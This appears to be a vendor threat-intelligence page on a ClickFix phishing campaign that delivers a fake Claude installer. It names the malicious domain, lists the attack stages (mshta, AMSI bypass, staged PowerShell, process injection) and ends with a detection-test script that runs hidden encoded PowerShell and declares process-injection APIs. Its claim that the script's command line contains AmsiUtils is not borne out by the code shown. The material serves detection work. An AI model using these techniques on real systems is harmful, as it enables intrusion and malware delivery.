SOC Prime Bias: Medium

17 Apr 2026 17:49
newspaper icon Rapid7

ClickFix Phishing Campaign Disguised as a Claude Installer

Author Photo
SOC Prime Team linkedin icon Follow
ClickFix Phishing Campaign Disguised as a Claude Installer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A phishing campaign used the ClickFix technique to distribute a malicious MSIX bundle disguised as the Claude AI installer. Initial execution relied on mshta launched through the Windows Run utility with a specially crafted URL. The downloaded payload contained an HTA file that built an obfuscated PowerShell stage, bypassed AMSI, retrieved additional PowerShell content, and executed a process injection routine using encrypted shellcode. The activity was observed across customer environments in both Europe and the United States and was detected through Rapid7 InsightIDR coverage.

Investigation

Rapid7 analysts identified mshta execution linked to the RunMRU registry key and captured the URL download-version.1-5-8.com/claude.msixbundle. Analysis showed that the MSIX archive included an HTA file that decoded obfuscated strings, assembled a PowerShell command, overwrote the AMSI context, and ultimately injected shellcode through native Windows API calls. Researchers also found that several follow-on PowerShell stages were downloaded from dynamically generated URLs derived from a hash built from the victim’s computer name and username.

Mitigation

Defenders should monitor the RunMRU registry key for suspicious mshta entries and block mshta execution when it originates from untrusted sources. Organizations should also restrict downloads of MSIX packages from unknown domains and enforce application allow-listing for PowerShell execution. AMSI protections should remain enabled, and PowerShell logging should be configured to capture encoded or obfuscated command activity for investigation.

Response

When this activity is detected, security teams should isolate the affected endpoint, preserve the command-line artifacts, and conduct forensic analysis of the downloaded PowerShell stages and any injected processes. Credentials used on the impacted system should be reset, and browser history should be reviewed to trace the initial lure. Detection logic should also be updated to include the observed domains, hashes, and related execution patterns.

"graph TB %% Class Definitions classDef action fill:#99ccff %% Nodes step_phishing["<b>Action</b> – T1566.002 Phishing: Spearphishing Link<br/><b>Description</b>: Victim clicks a malicious link that launches mshta."] class step_phishing action step_mshta["<b>Action</b> – T1218.005 Mshta<br/><b>Description</b>: Execute mshta with a URL pointing to a .msixbundle payload."] class step_mshta action step_hta_deobfuscation["<b>Action</b> – T1027.010, T1027.013, T1140 Deobfuscate/Decode Files<br/><b>Description</b>: HTA runs VBS that deu2011obfuscates the embedded malicious code."] class step_hta_deobfuscation action step_ps_encoded["<b>Action</b> – T1059.001 PowerShell<br/><b>Description</b>: Generate an encoded PowerShell command."] class step_ps_encoded action step_stage1["<b>Action</b> – T1059.001 PowerShell (Stageu20111)<br/><b>Description</b>: Compute MD5 of COMPUTERNAME+USERNAME, build URL and download Stageu20112."] class step_stage1 action step_stage2["<b>Action</b> – T1562.001 Impair Defenses (AMSI Bypass)<br/><b>Description</b>: Overwrite AMSI context and download Stageu20113."] class step_stage2 action step_stage3["<b>Action</b> – T1059.001 PowerShell (Stageu20113)<br/><b>Description</b>: Decode byte array and create a ScriptBlock for execution."] class step_stage3 action step_process_injection["<b>Action</b> – T1055 Process Injection<br/><b>Description</b>: Inject code into a target process using .NET and native APIs."] class step_process_injection action step_persistence["<b>Action</b> – T1547.014 Registry Run Keys / Startup Folder (RunMRU)<br/><b>Description</b>: Create a RunMRU registry entry to achieve persistence."] class step_persistence action %% Connections step_phishing –>|leads_to| step_mshta step_mshta –>|executes| step_hta_deobfuscation step_hta_deobfuscation –>|uses| step_ps_encoded step_ps_encoded –>|generates| step_stage1 step_stage1 –>|downloads| step_stage2 step_stage2 –>|downloads| step_stage3 step_stage3 –>|creates| step_process_injection step_mshta –>|establishes| step_persistence "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Objective: Execute a malicious PowerShell payload that is both base‑64 encoded and embedded with .NET assembly calls to perform process injection, mimicking a typical “living‑off‑the‑land” attack.
    2. Steps:
      • Create a small .NET assembly (C#) that calls OpenProcess and WriteProcessMemory (simulated via PowerShell’s [System.Runtime.InteropServices.Marshal]).
      • Encode the PowerShell script containing Invoke-Expression, FromBase64String, and a reference to System.Management.Automation.AmsiUtils (used to bypass AMSI).
      • Append a dummy marker 0x41414141 to emulate “padding” often seen in obfuscation.
      • Launch the script using powershell.exe with the full command line visible (so the detection rule can see the strings).

  • Regression Test Script:

    # ==============================================================
# Simulated malicious PowerShell execution to trigger Sigma rule
# ==============================================================
# 1. Build a simple .NET payload (inline, for demo purposes)
$cs = @'
using System;
using System.Runtime.InteropServices;
public class Injector {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
}
'@
Add-Type -TypeDefinition $cs -Language CSharp

# 2. Craft the malicious PowerShell snippet
$malicious = @'
$b64 = "aW1wb3J0IHN5c3RlbS5JTy5TY3JpcHQgJ1Rlc3QnLCBJVkU="
$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
Invoke-Expression $decoded
$dummy = 0x41414141
'@

# 3. Encode the snippet (Base64, UTF-16LE as PowerShell expects)
$bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious)
$encoded = [Convert]::ToBase64String($bytes)

# 4. Launch PowerShell with the encoded command
$cmd = "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded"
Write-Host "Launching malicious PowerShell..."
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -EncodedCommand $encoded" -WindowStyle Hidden

# Note: The above command line will contain the strings:
#   Invoke-Expression, FromBase64String, System.Management.Automation.AmsiUtils, 0x41414141
# which satisfy the Sigma detection condition.

  • Cleanup Commands:

    # Terminate any stray PowerShell instances launched by the test
Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match "EncodedCommand"} | Stop-Process -Force

# Remove any temporary modules or variables (if they were persisted)
Remove-Variable -Name b64, decoded, dummy -ErrorAction SilentlyContinue

End of Report

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free